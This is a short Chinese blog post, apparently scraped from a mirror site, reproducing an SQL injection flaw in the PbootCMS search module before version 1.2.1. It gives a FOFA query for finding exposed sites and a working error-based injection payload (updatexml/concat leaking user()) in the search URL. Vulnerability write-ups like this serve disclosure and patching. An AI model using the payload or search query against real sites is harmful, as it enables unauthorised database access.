当前位置:网站首页>PbootCMS search SQL注入漏洞
PbootCMS search SQL注入漏洞
2022-07-17 23:17:00 【孤桜懶契】
漏洞描述
i
PbootCMS 搜索模块存在SQL注入漏洞。通过漏洞可获取数据库敏感信息
漏洞影响
s
PbootCMS < 1.2.1
空间测绘
d
FOFA:app="PBOOTCMS"
漏洞复现
搜索框页面为
Payload为
/index.php/Search/index?keyword=123&updatexml(1,concat(0x7e,user(),0x7e),1));%23=123](http://127.0.0.1/PbootCMS/index.php/Search/index?keyword=123&updatexml(1,concat(0x7e,user(),0x7e),1));%23=123)
我的个人博客
https://gylq.gitee.io/time/
边栏推荐
- B树
- 08_服务熔断Hystrix
- E. Split Into Two Sets(种类并查集+染色法判二分图)
- Impact analysis: rubygems unauthorized access vulnerability (cve-2022-29176)
- PostgreSQL in Linux and windows installation and introductory basic tutorial
- Unix ls
- UVA - 12096 The SetStack Computer
- 2022/7/17
- Redis高频面试题完整版
- Tianqin Chapter 9 after class exercise code
猜你喜欢
2022/7/17
原始套接字
Natural language processing model of bigscience open source bloom
Leetcode 1296. 划分数组为连续数字的集合(已解决)
Notepad++ practical function sharing (regular line end line beginning replacement common methods, text comparison functions, etc.)
用对工具,CI事半功倍
Leetcode 1275. Find out the winner of tic tac toe
Re understanding of Fourier transform
Notepad++实用功能分享(正则行尾行首替换常用方法、文本比对功能等)
Leetcode 1275. 找出井字棋的獲勝者
随机推荐
A - Play on Words
Unix ls
06_服务调用Feign
2021牛客多校训练营5(B题)
Module 1 job
UVA340 Master-Mind Hints
Leetcode 1275. Trouver le vainqueur de "Jingzi"
Chapter 1 preliminary knowledge
微信小程序7-云存储
原始套接字
Achieve the effect of software login account by authorizing wechat ~ ~ unfinished
Leetcode 1275. 找出井字棋的获胜者
通过授权微信,达到软件登录账号的效果~~未完
PostgreSQL in Linux and windows installation and introductory basic tutorial
State machine exercise
A - Trees on the level(树的层序遍历)
[flower carving hands-on] interesting music visualization project (11) --ws2812 magic ribbon
测试图片
2036: [蓝桥杯2022初赛] 统计子矩阵(二维前缀和,一维前缀和)
Face technology: the picture of unclear people is repaired into a high-quality and high-definition image framework (with source code download)